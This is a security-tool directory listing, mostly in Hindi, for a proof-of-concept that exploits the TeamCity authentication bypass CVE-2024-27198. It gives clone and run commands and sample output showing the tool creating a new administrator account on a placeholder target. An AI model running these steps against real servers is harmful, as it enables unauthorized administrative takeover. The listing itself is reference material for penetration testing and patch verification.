Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-27198 — एक PoC टूल है जो TeamCity सर्वर में एक भेद्यता (CVE-2024-27198) को लक्षित करता है | Kitploit
उपकरण/GitHubGitHub/geniuszly/cve-2024-27198
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubgeniuszly/cve-2024-27198

CVE-2024-27198

एक PoC टूल है जो TeamCity सर्वर में एक भेद्यता (CVE-2024-27198) को लक्षित करता है

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

GenTeamCityExploit एक PoC उपकरण है जो TeamCity सर्वर (CVE-2024-27198) में एक कमजोरी को लक्षित करता है। यह प्रमाणीकरण बाईपास दोष का शोषण करके TeamCity संस्करण की खोज और एक नया व्यवस्थापक उपयोगकर्ता बनाने में सक्षम बनाता है।

विशेषताएँ

  • TeamCity सर्वर का संस्करण निकालता है।
  • ज्ञात कमजोरी (CVE-2024-27198) की उपस्थिति की जाँच करता है।
  • यदि सर्वर कमजोर है तो एक नया व्यवस्थापक उपयोगकर्ता बनाता है।

आवश्यक शर्तें

  • Python 3.6+: सुनिश्चित करें कि आपके पास Python स्थापित है।
  • लाइब्रेरीज़: आवश्यक लाइब्रेरीज़ को इस कमांड का उपयोग करके स्थापित करें:
    root@kitploit:~
    pip install requests urllib3
    

उपयोग

  1. रिपॉजिटरी को क्लोन करें।
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. निर्देशिका में जाएँ।
    root@kitploit:~
    cd CVE-2024-27198
    
  3. आवश्यक पैरामीटर के साथ स्क्रिप्ट चलाएँ।
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    पैरामीटर:
    • -t, --target: लक्ष्य TeamCity सर्वर का URL।
    • -u, --username: नए व्यवस्थापक उपयोगकर्ता के लिए उपयोगकर्ता नाम।
    • -p, --password: नए व्यवस्थापक उपयोगकर्ता के लिए पासवर्ड।

उदाहरण

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

उदाहरण आउटपुट

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

यदि सर्वर कमजोर नहीं है या संस्करण नहीं मिला है:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

यदि सर्वर से कनेक्ट होने में त्रुटि है:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है और इसका उपयोग मालिक की स्पष्ट अनुमति के बिना किसी भी सिस्टम पर नहीं किया जाना चाहिए। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है।

टूल डाउनलोड करें